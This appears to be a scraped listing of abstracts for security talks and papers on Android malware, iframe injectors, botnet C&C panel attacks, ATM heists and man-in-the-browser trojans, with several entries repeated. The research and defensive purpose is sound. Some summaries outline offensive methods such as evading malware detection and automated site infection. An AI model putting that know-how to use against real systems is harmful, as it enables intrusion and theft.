The Android platform has been plagued by malware for the past several years. Despite all attempts to detect and mitigate malicious applications on Android, malware is still flying under our radar and getting on our devices and causing millions of users financial and data loss every year. Additionally, the malware analysis community is at a large disagreement on how Android malware should be classified. In this talk, we’ll dive into the tactics, tools and procedures used by Android malware today, including several case studies of exceptional malware samples. By analyzing real code used by malware in the wild, we’ll be able to show the advancements in Android malware from a design perspective.
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
Cyber criminals are using advanced attacks to exploit online banking systems and services to covertly steal money. This paper describes the tactics currently used by cyber criminals to conduct cyber bank robbery
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses about the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from the real time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored for making the testing easier for the researchers.
DOWNLOAD from this link : http://secniche.org/blackhat-2014/
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...Aditya K Sood
This document discusses cross interface attacks that can infect network devices. It describes how malware can exploit vulnerabilities in the web interfaces, FTP/Telnet login consoles, and log storage modules of network devices. By injecting malicious payloads through the backend login consoles, persistent infections can occur as the payloads are rendered in the device's HTML error logs without filtering. A case study is presented of a vulnerability in Synology Disk Station Manager devices that allowed CSRF attacks and cookie stealing by injecting payloads through the FTP login console.
Abusing Glype Proxies - Attacks, Exploits and DefencesAditya K Sood
Proxies play a critical privacy role by allowing anonymous web surfing and identity cloaking. Glype is an open source PHP proxy that is commonly used and provides anonymity. However, Glype proxies also have weaknesses that can allow attackers to exploit them. Misconfigured Glype proxies can leak users' sensitive information through log files and cookies. Attackers can also use Glype proxies to distribute malware by modifying the proxy software and using plugins. Strong authentication, disabling logs, and removing vulnerabilities are recommended to prevent abuse of Glype proxies.
An international hacking ring hacked into the computer system of a bank's London branch and obtained the account number of the ATM computer system's administrator, giving them access to the internal network and ability to remotely control ATMs. Hackers have also used malware installed on bank cards to empty cash from ATMs without a associated bank account by bypassing authentication. Another attack involved remotely installing malware called ATMitch on bank ATMs that allowed hackers to dispense cash at the touch of a button from a command center.
Secure coding is the practice of developing software securely by avoiding security vulnerabilities. It involves understanding the application's attack surface and using techniques like input validation, secure authentication, access control, and encrypting sensitive data. The OWASP organization provides free tools and guidelines to help developers code securely, such as their Top 10 security risks and cheat sheets on issues like injection, authentication, and access control. Developers should use static and dynamic application security testing tools to identify vulnerabilities and continuously learn about secure coding best practices.
In this article, we discuss the design of an iframe injector used to infect web-hosting software such as cPanel in an automated manner. Several different iframe injector designs exist, but we look at one of the most basic: NiFramer.
CrossTalk - The Art of Cyber Bank Robbery - Stealing your Money Through Insid...Aditya K Sood
Cyber criminals are using advanced attacks to exploit online banking systems and services to covertly steal money. This paper describes the tactics currently used by cyber criminals to conduct cyber bank robbery
BlackHat 2014 Briefings - Exploiting Fundamental Weaknesses in Botnet C&C Pan...Aditya K Sood
Bot herders deploy Command and Control (C&C) panels for commanding and collecting exfiltrated data from the infected hosts on the Internet. To protect C&C panels, bot herders deploy several built-in (software-centric) protection mechanisms to restrict direct access to these C&C panels. However, there exist fundamental mistakes in the design and deployment of these C&C panels that can be exploited to take complete control. This talk discusses about the methodology of launching reverse attacks on the centralized C&C panels to derive intelligence that can be used to build automated solutions. This research reveals how to detect vulnerabilities and configuration flaws in the remote C&C panels and exploit them by following the path of penetration testing. This talk is derived from the real time research in which several C&C panels were targeted and intelligence was gathered to attack the next set of C&C panels. A number of case studies will be discussed to elaborate step-by-step process of attacking and compromising C&C panels. This talk also demonstrates the use of automated tools authored for making the testing easier for the researchers.
DOWNLOAD from this link : http://secniche.org/blackhat-2014/
13th Symposium of Association of Anti Virus Asia Researchers (AAVAR 2010) con...Aditya K Sood
This document discusses cross interface attacks that can infect network devices. It describes how malware can exploit vulnerabilities in the web interfaces, FTP/Telnet login consoles, and log storage modules of network devices. By injecting malicious payloads through the backend login consoles, persistent infections can occur as the payloads are rendered in the device's HTML error logs without filtering. A case study is presented of a vulnerability in Synology Disk Station Manager devices that allowed CSRF attacks and cookie stealing by injecting payloads through the FTP login console.
Abusing Glype Proxies - Attacks, Exploits and DefencesAditya K Sood
Proxies play a critical privacy role by allowing anonymous web surfing and identity cloaking. Glype is an open source PHP proxy that is commonly used and provides anonymity. However, Glype proxies also have weaknesses that can allow attackers to exploit them. Misconfigured Glype proxies can leak users' sensitive information through log files and cookies. Attackers can also use Glype proxies to distribute malware by modifying the proxy software and using plugins. Strong authentication, disabling logs, and removing vulnerabilities are recommended to prevent abuse of Glype proxies.
An international hacking ring hacked into the computer system of a bank's London branch and obtained the account number of the ATM computer system's administrator, giving them access to the internal network and ability to remotely control ATMs. Hackers have also used malware installed on bank cards to empty cash from ATMs without a associated bank account by bypassing authentication. Another attack involved remotely installing malware called ATMitch on bank ATMs that allowed hackers to dispense cash at the touch of a button from a command center.
Secure coding is the practice of developing software securely by avoiding security vulnerabilities. It involves understanding the application's attack surface and using techniques like input validation, secure authentication, access control, and encrypting sensitive data. The OWASP organization provides free tools and guidelines to help developers code securely, such as their Top 10 security risks and cheat sheets on issues like injection, authentication, and access control. Developers should use static and dynamic application security testing tools to identify vulnerabilities and continuously learn about secure coding best practices.
Georgia Weidman discusses various ways that Android permissions can be bypassed, including through exploiting permissions, storing sensitive data without protection, and open interfaces. She demonstrates how apps can abuse permissions to access contacts and send SMS, how unprotected storage allows data access, and how interfaces can be used to trigger SMS sending without consent. Mitigations include securing data, limiting interfaces, and ensuring updates are available to patch vulnerabilities.
An expert in custom Android malware for penetration testing discussed building custom malware to bypass security controls. The speaker outlined their methodology which included researching existing malware techniques, probing the environment, uploading unmodified malware, and creating altered versions to evade detection. The talk covered functionality like autostarting, collecting device data, and communicating with command and control servers. Various scenarios were proposed like using vulnerable libraries or requesting all permissions to test security controls.
This document discusses mobile malware and how to protect against it. It begins by defining malware and listing common types. It then provides statistics on the distribution of mobile operating systems and malware detections. The document outlines sources of mobile malware infections and discusses why mobile devices contain sensitive information. It recommends implementing mobile device management to centrally manage devices and deploy security policies. Examples of recent mobile threats are also described. The document concludes by recommending security best practices like using antivirus software, updating devices, and educating users.
Mobile Threats and Trends Changing Mobile App SecurityDevOps.com
Deploying your high-value mobile app to untrusted environments such as consumer mobile devices can be a risky proposition. Are some of your customers’ devices compromised? Do your users also download apps from untrusted sources? Is there malware residing on their devices that target apps such as yours?
Despite your best efforts to code secure apps, assess their security posture, and remediate any identified vulnerabilities – it’s not quite enough in today’s mobile threat landscape. Safeguarding mobile apps during runtime and empowering them to protect themselves in hostile environments is becoming a necessity in the face of ever-evolving mobile attack tactics and techniques.
During this webinar, we will:
Discuss today’s mobile app threat landscape
Explain how changing distribution models (e.g., Fortnite for Android) affect your app’s security
Illustrate the potential financial impact of mobile threats on a business’s bottom line
Demonstrate mobile overlay and other attacks
Reveal how mobile apps can protect themselves against these attacks with app shielding and runtime protection
This gives insight on how people manipulate online servers to do harm, *without* exposing security risks.This simply explains whats going on during this activity and how to protect yourself.
The presentation covered Android architecture, security model, and ways attackers can exploit Android devices. It discussed how Android is based on the Linux kernel and uses the Dalvik VM. The presentation demonstrated how to build an Android malware through reverse engineering apps and developing malicious apps from scratch. Various real-world Android malware were also described.
This document provides an overview of Android security at the system, application, and enterprise levels. At the system level, it discusses Android architecture, sandboxing, permissions, and security measures like ASLR and NX-bit. It describes application security features like intents, permissions, and application signing. Finally, it outlines enterprise security capabilities such as full-disk encryption, device policies for remote wipe/location, and VPN integration.
The document provides an overview of penetration testing basics from a presentation by The Internet Storm Center, SANS Institute, and GIAC Certification Program. It discusses the Internet Storm Center, SANS/GIAC training and certifications, common cyber threats, the methodology for penetration testing, tools used for various stages like reconnaissance, scanning, exploitation, and analysis, and the importance of reporting and mitigation strategies.
This document discusses network penetration testing conducted by Information Security Group. Network penetration testing uncovers network weaknesses before malicious hackers can exploit them. It involves testing a network from both external and internal perspectives to identify vulnerabilities. The methodology involves information gathering, analysis and planning, vulnerability identification, exploitation, risk analysis and remediation suggestions, and reporting. Specific vulnerabilities examined include open ports and services, packet sniffing, denial of service attacks, authentication issues, and more.
Fraud is a key--and evolving--challenge facing security teams today. This presentations highlight tactics organizations can deploy to dramatically reduce incidents of fraud, provides a high-level, technical overview of client-side attacks and demonstrates how man-in-the-browser attacks operate, reveals two techniques that can be used by a Web application to detect infected clients, and discusses practical aspects of implementing these two methods and how to use the output of the detection process in the application.
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET Journal
This document summarizes methods for detecting Android ransomware through static, dynamic, and hybrid analysis approaches. Static analysis involves analyzing an Android app's code and resources without executing it. Some key static analysis techniques discussed are permission analysis, text analysis to search for ransomware keywords, and code analysis to check for encryption or screen locking behavior. Dynamic analysis executes the app and monitors its runtime behavior. Hybrid analysis combines both static and dynamic techniques. The document outlines several studies that have proposed and evaluated different static, dynamic, and hybrid analysis methods for detecting Android ransomware.
This document provides an overview of Android application sandboxes and how they can be used for suspicious software detection. It discusses how Android uses a modified Linux kernel to run Java-based apps in an isolated environment. The document describes how an Android application sandbox called AASandbox works by hijacking system calls using a loadable kernel module and then performing both static analysis of app files and dynamic analysis by running apps in an Android emulator and monitoring system calls. It provides examples of analyzing self-written apps and experiments using over 150 popular apps from the Android Market.
Drozer - An Android Application Security Tool nullowaspmumbai
The document discusses the Android application security tool Drozer. It provides an overview of Drozer's capabilities including leaking content providers, attacking broadcast receivers, and abusing application permissions. The document then demonstrates Drozer's usage through several examples analyzing vulnerable Android applications and exploiting issues like content provider leakage, insecure broadcast receivers, and permission abuse.
The document provides information on various certification and training options for penetration testing and ethical hacking. It discusses several vendors that provide both online and bootcamp training programs, and lists the costs associated with each. It provides details on certifications from vendors like CompTIA, EC-Council, GIAC, Mile2, and Offensive Security. These certifications range in focus from foundational security skills to advanced penetration testing. The document also notes some free online resources available for additional preparation.
This document provides an overview of the Android permission system. It discusses how Android uses a permission model to control access to system resources and protect user privacy and security. Permissions are categorized as normal, dangerous, or signature/system level. The document outlines how permissions are declared in manifest files and enforced at both install-time and runtime via checks by the package manager. It also describes how permissions relate to application sandboxing using Linux users and groups, and how they are checked for various app components like activities, services, and broadcasts.
1) Man-in-the-Browser attacks involve malicious code modifying users' actions online and stealing confidential information without detection.
2) The attacks are carried out by trojans that install browser extensions searching for targeted sites, modifying form data submitted to servers, and replacing transaction receipts with modified versions.
3) Zeus is a prominent banking trojan that steals login credentials through keylogging and form grabbing. It has evolved over many versions to automate the fraud process from infection to cashing out.
This document summarizes key topics from Part 2 of a course on analyzing Android applications, including code signing, application permissions, the application sandbox model, and filesystem encryption. It discusses how Android validates application signatures but does not verify certificates are from a trusted authority. It also describes the different permission protection levels and limitations of the application sandbox and filesystem encryption.
The document discusses permissions in Android security and outlines 3 main threats: permission re-delegation, over-privileged apps, and permission inheritance. It then describes 11 proposed solutions to these threats, categorizing each solution by type (system modification, Android service, or non-Android app), implementation level (system, app, or separate system), and running mode (static or dynamic). Finally, it notes areas for future work, such as combining solutions and evaluating solutions based on factors like performance and complexity.
by Axelle Apvrille & Ange Albertini
presented at BlackHat Europe 2014, in Amsterdam
PoC: https://github.com/cryptax/angeapk
AngeCryption: http://corkami.googlecode.com/svn/trunk/src/angecryption/
Indian power companies want to ban Chinese equipment over security concerns that critical infrastructure could be hacked, threatening national security and major power disruptions. The CEO of Cisco has also warned that 2015 will see worse cyber attacks on businesses as more devices are connected to the internet. Cyber attacks using unknown vulnerabilities could potentially compromise systems controlling important sectors like power, transport, telecom and more, and cause widespread issues. Proactive security testing of both known and unknown vulnerabilities is important to mitigate cyber threats.
Georgia Weidman discusses various ways that Android permissions can be bypassed, including through exploiting permissions, storing sensitive data without protection, and open interfaces. She demonstrates how apps can abuse permissions to access contacts and send SMS, how unprotected storage allows data access, and how interfaces can be used to trigger SMS sending without consent. Mitigations include securing data, limiting interfaces, and ensuring updates are available to patch vulnerabilities.
An expert in custom Android malware for penetration testing discussed building custom malware to bypass security controls. The speaker outlined their methodology which included researching existing malware techniques, probing the environment, uploading unmodified malware, and creating altered versions to evade detection. The talk covered functionality like autostarting, collecting device data, and communicating with command and control servers. Various scenarios were proposed like using vulnerable libraries or requesting all permissions to test security controls.
This document discusses mobile malware and how to protect against it. It begins by defining malware and listing common types. It then provides statistics on the distribution of mobile operating systems and malware detections. The document outlines sources of mobile malware infections and discusses why mobile devices contain sensitive information. It recommends implementing mobile device management to centrally manage devices and deploy security policies. Examples of recent mobile threats are also described. The document concludes by recommending security best practices like using antivirus software, updating devices, and educating users.
Mobile Threats and Trends Changing Mobile App SecurityDevOps.com
Deploying your high-value mobile app to untrusted environments such as consumer mobile devices can be a risky proposition. Are some of your customers’ devices compromised? Do your users also download apps from untrusted sources? Is there malware residing on their devices that target apps such as yours?
Despite your best efforts to code secure apps, assess their security posture, and remediate any identified vulnerabilities – it’s not quite enough in today’s mobile threat landscape. Safeguarding mobile apps during runtime and empowering them to protect themselves in hostile environments is becoming a necessity in the face of ever-evolving mobile attack tactics and techniques.
During this webinar, we will:
Discuss today’s mobile app threat landscape
Explain how changing distribution models (e.g., Fortnite for Android) affect your app’s security
Illustrate the potential financial impact of mobile threats on a business’s bottom line
Demonstrate mobile overlay and other attacks
Reveal how mobile apps can protect themselves against these attacks with app shielding and runtime protection
This gives insight on how people manipulate online servers to do harm, *without* exposing security risks.This simply explains whats going on during this activity and how to protect yourself.
The presentation covered Android architecture, security model, and ways attackers can exploit Android devices. It discussed how Android is based on the Linux kernel and uses the Dalvik VM. The presentation demonstrated how to build an Android malware through reverse engineering apps and developing malicious apps from scratch. Various real-world Android malware were also described.
This document provides an overview of Android security at the system, application, and enterprise levels. At the system level, it discusses Android architecture, sandboxing, permissions, and security measures like ASLR and NX-bit. It describes application security features like intents, permissions, and application signing. Finally, it outlines enterprise security capabilities such as full-disk encryption, device policies for remote wipe/location, and VPN integration.
The document provides an overview of penetration testing basics from a presentation by The Internet Storm Center, SANS Institute, and GIAC Certification Program. It discusses the Internet Storm Center, SANS/GIAC training and certifications, common cyber threats, the methodology for penetration testing, tools used for various stages like reconnaissance, scanning, exploitation, and analysis, and the importance of reporting and mitigation strategies.
This document discusses network penetration testing conducted by Information Security Group. Network penetration testing uncovers network weaknesses before malicious hackers can exploit them. It involves testing a network from both external and internal perspectives to identify vulnerabilities. The methodology involves information gathering, analysis and planning, vulnerability identification, exploitation, risk analysis and remediation suggestions, and reporting. Specific vulnerabilities examined include open ports and services, packet sniffing, denial of service attacks, authentication issues, and more.
Fraud is a key--and evolving--challenge facing security teams today. This presentations highlight tactics organizations can deploy to dramatically reduce incidents of fraud, provides a high-level, technical overview of client-side attacks and demonstrates how man-in-the-browser attacks operate, reveals two techniques that can be used by a Web application to detect infected clients, and discusses practical aspects of implementing these two methods and how to use the output of the detection process in the application.
IRJET- A Survey on Android Ransomware and its Detection MethodsIRJET Journal
This document summarizes methods for detecting Android ransomware through static, dynamic, and hybrid analysis approaches. Static analysis involves analyzing an Android app's code and resources without executing it. Some key static analysis techniques discussed are permission analysis, text analysis to search for ransomware keywords, and code analysis to check for encryption or screen locking behavior. Dynamic analysis executes the app and monitors its runtime behavior. Hybrid analysis combines both static and dynamic techniques. The document outlines several studies that have proposed and evaluated different static, dynamic, and hybrid analysis methods for detecting Android ransomware.
This document provides an overview of Android application sandboxes and how they can be used for suspicious software detection. It discusses how Android uses a modified Linux kernel to run Java-based apps in an isolated environment. The document describes how an Android application sandbox called AASandbox works by hijacking system calls using a loadable kernel module and then performing both static analysis of app files and dynamic analysis by running apps in an Android emulator and monitoring system calls. It provides examples of analyzing self-written apps and experiments using over 150 popular apps from the Android Market.
Drozer - An Android Application Security Tool nullowaspmumbai
The document discusses the Android application security tool Drozer. It provides an overview of Drozer's capabilities including leaking content providers, attacking broadcast receivers, and abusing application permissions. The document then demonstrates Drozer's usage through several examples analyzing vulnerable Android applications and exploiting issues like content provider leakage, insecure broadcast receivers, and permission abuse.
The document provides information on various certification and training options for penetration testing and ethical hacking. It discusses several vendors that provide both online and bootcamp training programs, and lists the costs associated with each. It provides details on certifications from vendors like CompTIA, EC-Council, GIAC, Mile2, and Offensive Security. These certifications range in focus from foundational security skills to advanced penetration testing. The document also notes some free online resources available for additional preparation.
This document provides an overview of the Android permission system. It discusses how Android uses a permission model to control access to system resources and protect user privacy and security. Permissions are categorized as normal, dangerous, or signature/system level. The document outlines how permissions are declared in manifest files and enforced at both install-time and runtime via checks by the package manager. It also describes how permissions relate to application sandboxing using Linux users and groups, and how they are checked for various app components like activities, services, and broadcasts.
1) Man-in-the-Browser attacks involve malicious code modifying users' actions online and stealing confidential information without detection.
2) The attacks are carried out by trojans that install browser extensions searching for targeted sites, modifying form data submitted to servers, and replacing transaction receipts with modified versions.
3) Zeus is a prominent banking trojan that steals login credentials through keylogging and form grabbing. It has evolved over many versions to automate the fraud process from infection to cashing out.
This document summarizes key topics from Part 2 of a course on analyzing Android applications, including code signing, application permissions, the application sandbox model, and filesystem encryption. It discusses how Android validates application signatures but does not verify certificates are from a trusted authority. It also describes the different permission protection levels and limitations of the application sandbox and filesystem encryption.
The document discusses permissions in Android security and outlines 3 main threats: permission re-delegation, over-privileged apps, and permission inheritance. It then describes 11 proposed solutions to these threats, categorizing each solution by type (system modification, Android service, or non-Android app), implementation level (system, app, or separate system), and running mode (static or dynamic). Finally, it notes areas for future work, such as combining solutions and evaluating solutions based on factors like performance and complexity.
by Axelle Apvrille & Ange Albertini
presented at BlackHat Europe 2014, in Amsterdam
PoC: https://github.com/cryptax/angeapk
AngeCryption: http://corkami.googlecode.com/svn/trunk/src/angecryption/
Indian power companies want to ban Chinese equipment over security concerns that critical infrastructure could be hacked, threatening national security and major power disruptions. The CEO of Cisco has also warned that 2015 will see worse cyber attacks on businesses as more devices are connected to the internet. Cyber attacks using unknown vulnerabilities could potentially compromise systems controlling important sectors like power, transport, telecom and more, and cause widespread issues. Proactive security testing of both known and unknown vulnerabilities is important to mitigate cyber threats.
This document provides a research profile for Prof. Dr. Florian Matthes and the sebis research group at the Technical University of Munich. The group conducts research in the areas of Enterprise Architecture Management and Social Software Engineering. Some of their projects include developing agile approaches to EAM, quantitative models for EAM, and social software for collaborative knowledge work and problem solving. The profile lists the researchers in the group and their industry partners for technology transfer projects.
This document provides an overview of reverse engineering Android apps. It discusses the anatomy of Android apps, obtaining target apps from a device or Google Play, and tools for disassembling and decompiling apps like Apktool, Dex2jar, and Android decompilers. It also promotes the use of Santoku Linux, an operating system distribution containing tools for mobile forensics and malware analysis.
BlackHat USA 2013 Arsenal - Sparty : A FrontPage and SharePoint Security Audi...Aditya K Sood
Sparty is an open source Python tool that assists penetration testers in auditing SharePoint and FrontPage configurations. It identifies configuration flaws like exposed passwords, permissions, and services. The tool fingerprints versions, dumps passwords from files, scans for exposed directories and services, and checks file permissions and access. It currently analyzes SharePoint and FrontPage but future versions aim to integrate vulnerability checks and extended payload testing.
Mobile analysis-kung-fu-santoku-style-viaforensics-rsa-conference-2014viaForensics
This document summarizes a presentation on mobile forensics and security analysis techniques. It introduces the Santoku Linux distribution for mobile forensics work. It then describes methods for acquiring data from iOS and Android devices, both logically and physically. It also analyzes specific mobile apps like Any.Do for security vulnerabilities and stored private data. Finally, it demonstrates malware analysis techniques on samples like NQ Mobile and BadNews, using tools like apktool to disassemble apps and analyze the smali code.
Via forensics thotcon-2013-mobile-security-with-santoku-linuxviaForensics
ViaForensics presented on their mobile security tools Santoku Linux and AFLogical OSE. They discussed analyzing the Any.DO task manager app, finding it stored usernames and passwords insecurely. They also analyzed the BadNews Android malware, disassembling its APK with apktool to find suspicious permissions and code starting on boot.
One Phish, Two Phish, Red Phish, Your Account Details Just Got StolenOpenDNS
Most people are overconfident in their ability to identify phishing attacks according to a study. Only 7.5% of participants were able to identify all fake emails. PayPal, eBay, Apple and AOL were the most frequently targeted brands by phishers according to the analysis of phishing URLs reported to PhishTank. The document provides tips on how to avoid falling victim to phishing like checking URLs carefully, using strong and unique passwords, being wary of prize offers, going directly to the company website, and using security tools.
Cyber Security for Critical Infrastrucutre-pptMohit Rampal
The document discusses cyber security threats to critical infrastructure and the need for proactive cyber defense. It notes that cyber attacks are becoming more sophisticated and professional. Zero-day vulnerabilities pose one of the biggest threats since there are no existing defenses. It also discusses how security of industrial control systems is changing as these systems become more interconnected and integrated with other networks. Fuzz testing and maturity models for fuzz testing are introduced as important methods for detecting unknown vulnerabilities. Maintaining security will require managing both known and unknown vulnerabilities through approaches like fuzz testing.
What is Shodan?
- Search engine for the Internet connected devices by John Matherly (@achillean).
- Probes devices on specific ports, aggregates the output and indexes aka Google for TCP banners
- Has a powerful API, Python & Ruby libraries
- Integration with Maltego, Metasploit & Armitage.
BlackHat Arsenal 2014 - C-SCAD : Assessing Security Flaws in C-SCAD WebX Clie...Aditya K Sood
C-SCAD is an information gathering and penetration testing tool written to assess the security issues present in the Web-X (Internet Explorer-based web interface) client used to interact with the ClearSCADA server. WebX client is hosted on the embedded web server which is shipped as a part of complete ClearSCADA architecture. Primarily, the WebX client is restricted to perform any configuration changes but it can reveal potential information about the ClearSCADA server and associated components. Insecure deployments of WebX client can reveal potential information about the various functions such as alarm pages, SQL lists, and diagnostic checks including various reports.
APT 28 :Cyber Espionage and the Russian Government?anupriti
Russia may be behind a long-standing, careful campaign designed to steal sensitive data relating to governments, militaries and security firms worldwide.This presentation based on a report made public by FireEye brings an over view of their opinion.....uploaded here just for general info to understand how its all happening!!!!
Introduction to Industrial Control Systems : Pentesting PLCs 101 (BlackHat Eu...arnaudsoullie
This document provides an overview of industrial control systems (ICS) and Programmable Logic Controllers (PLCs). It discusses the components of ICS, including sensors, actuators, HMIs, PLCs, and more. It also covers the MODBUS protocol commonly used in ICS, providing details on its master/slave architecture and function codes. The document concludes by discussing tools used in the workshop, such as Kali Linux, MBTGET, PLCSCAN, and Metasploit modules, to analyze MODBUS communications, perform reconnaissance on PLCs, and attack standard services and protocols.
Speaker:Santhosh Kumar
Event:Defcon Kerala
Date:8/03/2014
Android-Forensic and Security Analysis.
Android one of the leading Mobile Operating System which is managed by Google released back in 2008 now stands with a 4.4.x version Android KitKat.The Study Shows that increasing Crime Rates are switching from Computer Centered to PDA Based.Crime against Women,Children And Abuse.As the Digital Forensics and Law Enforcement Agencies find new Hard Challenges Cracking Down different Situation in the Android Environment.Google Play Store which has over 1 Million Application Active has also added to the Pain.
The Talk Focus on various Methods,the Various Situation where the forensics is useful.
The Methods are classified as Logical and physical which involves from breaking the passcodes to exploring virtual NAND memory.
The talk also focus on various places where is information is available to the forensic point of view.
Affected by Mobile Cyber Attack? Tortured by a Android Smartphone ? Relax there is a solution to each and everything.
The Talk also focus on using both Windows And linux as the Forensic Investigation Environment.
Android Which has the linux kernel at Heart can be best paradise when it comes to Forensic Data.
Various Tools on way this can be done in faster way.
Forensic always useful whether you are from a corporate environment or even from the massive Law enforcement Agencies.
The document discusses NASA's social media strategy and evolution. It notes that NASA has over 467 social media accounts managed by 2 full-time employees, 10 center social media leads, and 11 part-time leads. The accounts have evolved organically over time into a structured "solar system" model with flagship accounts at the center and more specialized niche accounts. The strategy harnesses the power of flagship accounts to reach broad audiences while allowing specialized accounts to engage specific interest groups. This approach has helped NASA achieve milestones like the first tweet from space in 2009.
This document discusses how to make Android applications more secure by summarizing techniques used by hackers and how to avoid their attacks. It provides an overview of the Android framework and security features like permissions. It then discusses how to secure the Android manifest file and avoid exposing unnecessary components. It demonstrates how to prevent attacks like reverse engineering APK files, SQL injections, and hacking in-app purchases through the billing services. The conclusion emphasizes that while Android is secure, users and unknown application sources can bypass protections, so developers must implement additional security measures within their applications.
Getting started with Android pentestingMinali Arora
Minali Arora is a cyber security professional with 6 years of experience in application and network pentesting, bash scripting, and red teaming. She is also a part-time bug bounty hunter and blogger. The document discusses Android security architecture, testing methodologies, common vulnerabilities, and security tips for developers. It covers topics such as Android security model, application components, static and dynamic testing tools, and the OWASP top 10.
The Ultimate Android Security Checklist (Codemotion Tel-Aviv, 2014)Ron Munitz
My Android Security session in Code Motion , December 2014, Tel-Aviv, Israel.
In this session I will present the essential security measures for Application Developers, show how to reverse engineer purely protected apps, and discuss what common security guidelines will and will not work against untrusted, rooted devices. The session will include the confessions of an evil, yet good attacker, and will unleash some serious security flaws you have probably never considered in your app development.
For Training/Consulting requests: info@thepscg.com
Minali Arora is a cyber security professional with 6 years of experience in application and network pentesting, bash scripting, and red teaming. She also works as a part-time bug bounty hunter and blogger. The document discusses Android security architecture, which uses UID separation and sandboxing to isolate apps from each other. It describes tools used for static and dynamic Android application testing such as apktool, dex2jar, and Drozer. Common vulnerabilities found include OTP bypass, authentication bypass, and privilege escalation. The document provides tips for developers to store data safely, enforce secure communication, and implement least privilege permissions.
Ron Munitz - The Ultimate Android Security Checklist - Codemotion Rome 2015Codemotion
Ron Munitz - Codemotion Rome 2015
In this session I will present the essential security measures for Application Developers, show how to reverse engineer purely protected apps, and discuss what common security guidelines will and will not work against untrusted, rooted devices. The session will include the confessions of an evil, yet good attacker, and will unleash some serious security flaws you have probably never considered in your app development.
The document provides an overview of security testing techniques for mobile applications on various platforms including Android, BlackBerry, and iOS. It discusses topics such as application threat models, traffic analysis and manipulation, insecure data storage, reverse engineering application binaries, analyzing application components and runtime behavior. The goal is to identify vulnerabilities that could impact the confidentiality, integrity or availability of the mobile application or user data.
The document provides an overview of security testing techniques for mobile applications on different platforms like Android, BlackBerry and iOS. It discusses topics like application threat models, traffic analysis and manipulation, insecure data storage, reverse engineering application binaries, analyzing application components and runtime behavior. The document also mentions tools used for tasks like decompilation, debugging, monitoring network/file activity. Specific platform security features for Android, BlackBerry and iOS are outlined.
The Ultimate Android Security Checklist (Mdevcon 2014)Ron Munitz
My session in Mdevcon, March 2014, Amsterdam, The Netherlands.
In this session I will present the essential security measures for Application Developers, show how to reverse engineer purely protected apps, and discuss what common security guidelines will and will not work against untrusted, rooted devices.
The session will include the confessions of an evil, yet good attacker, and will unleash some serious security flaws you have probably never considered in your app development.
For Training/Consulting requests: info@thepscg.com
Securely Deploying Android Device - ISSA (Ireland)Angelill0
Angel Alonso-Parrizas presented ways to securely deploy Android devices. The document discussed improving security in areas like communications channels, access control, software policies and passwords. It proposed establishing an encrypted VPN tunnel for all device traffic. The document also suggested disabling USB access, enforcing strong passwords, and remotely installing authorized apps only. The goal was to align Android devices with corporate security policies and IT management.
Null Mumbai Meet_Android Reverse Engineering by Samrat Dasnullowaspmumbai
Android Reverse Engineering by Samrat Das
Abstract
• Intro to Reverse Engineering
• Short walkthough with Windows RE
• Introduction to Mobile Security Assessments
• Dalvik Virtual Machine vs JVM
• APK Walkthrough
• Components of Android
• Steps of Reverse Engineering Android Applications
• Hands-on demos on manual reversing of android apps
• Introduction to APPuse VM for droid assessments
• Detecting developer backdoors
• Creating Infected Android Applications
• Anti-Reversing | Obfuscation
The document discusses implementing security on Android applications. It provides an overview of the Android architecture, including its application model and security mechanisms like isolation, permissions, and signatures. It then reviews the Android software stack and key components like the activity manager, notification manager, and package manager. Next, it describes a system called TISSA that aims to provide security for user contacts, call logs, and location data by regulating access through a privacy settings content provider and privacy aware components. However, it notes that TISSA has limitations like occasionally providing fake responses and only using single privacy settings per private information type.
This document provides an overview of mobile application security testing. It discusses the mobile security stack including the infrastructure, hardware, operating system and application layers. It then covers topics like mobile threat modeling, mobile application auditing techniques including dynamic and static analysis. The document also discusses the OWASP top 10 mobile risks and provides case studies and demonstrations on pentesting real mobile applications and reverse engineering Android malware.
This document provides an overview of mobile application security testing. It discusses the mobile security stack including the infrastructure, hardware, operating system and application layers. It then covers topics like mobile threat modeling, mobile application auditing techniques including dynamic and static analysis. The document also discusses the OWASP top 10 mobile risks and provides case studies and demonstrations on pentesting real mobile applications and reverse engineering Android malware.
The document summarizes an Android security workshop that took place on February 24th, 2016 in Poland. The workshop included sessions on Android fundamentals, application component security, and the OWASP top 10 mobile risks. It also covered reverse engineering and malware analysis. The document provides an agenda and summaries of the topics discussed in each session, including details on Android architecture, security features in Android 6.0, application permissions and components, and common mobile risks. It aims to provide attendees with a basic understanding of Android security concepts and methodologies for analyzing mobile applications for security issues.
This document provides an overview of attacking Android devices. It discusses Android's architecture and security model, popular versions and their vulnerabilities, and methods for remotely accessing a device and elevating privileges. The presenters demonstrate gaining root access on an Android 2.1 device through a browser vulnerability and vendor kernel bug. They discuss options for backdooring devices at the application or system level for persistent remote access.
This document summarizes the key points from a talk on Android application security. It discusses how every Android app poses a potential security risk if it contains bugs. It then outlines several areas where apps are vulnerable, including overprivileged permissions, intent spoofing, unauthorized intent receipt, and privilege redelegation. The document concludes by mentioning a real-time demonstration of exploiting vulnerabilities in the Odnoklassniki Android app.
Introduction to Android Application Security Testing - 2nd Sep 2017Satheesh Kumar V
This document provides an introduction to mobile application security with a focus on Android. It discusses Android architecture, application fundamentals, security model, and tools for reverse engineering Android apps. It also summarizes the top 10 mobile risks from the OWASP Mobile Top 10 including issues like insecure data storage, authentication, authorization, and code quality. Hands-on examples are provided for reverse engineering apps and analyzing the application permissions.
